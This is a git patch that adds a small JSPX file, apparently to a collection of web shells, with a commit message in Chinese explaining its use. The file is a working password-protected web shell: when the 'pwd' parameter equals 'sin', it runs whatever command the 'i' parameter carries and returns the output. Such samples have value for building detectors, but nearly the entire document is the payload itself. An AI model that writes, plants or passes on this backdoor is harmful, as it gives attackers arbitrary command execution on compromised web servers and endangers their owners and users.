From 1b499ce7bb9105a032f1f2fa4875bdfa037f0238 Mon Sep 17 00:00:00 2001
From: tennc <tennc@users.noreply.github.com>
Date: Mon, 18 May 2015 15:12:43 +0800
Subject: [PATCH] Create jw.jspx
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

from wooyun.org
使用说明：http://xx.xx.xx/jw.jspx?pwd=sin&i=ls
有回显，带密码
---
 jspx/jw.jspx | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
 create mode 100644 jspx/jw.jspx

diff --git a/jspx/jw.jspx b/jspx/jw.jspx
new file mode 100644
index 0000000..8980e5b
--- /dev/null
+++ b/jspx/jw.jspx
@@ -0,0 +1,15 @@
+<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"  version="1.2"> 
+<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" /> 
+<jsp:scriptlet> 
+    if("sin".equals(request.getParameter("pwd"))){ 
+        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); 
+        int a = -1; 
+        byte[] b = new byte[2048]; 
+        out.print("&lt;pre&gt;"); 
+        while((a=in.read(b))!=-1){ 
+            out.println(new String(b)); 
+        } 
+        out.print("&lt;/pre&gt;"); 
+    } 
+</jsp:scriptlet> 
+</jsp:root>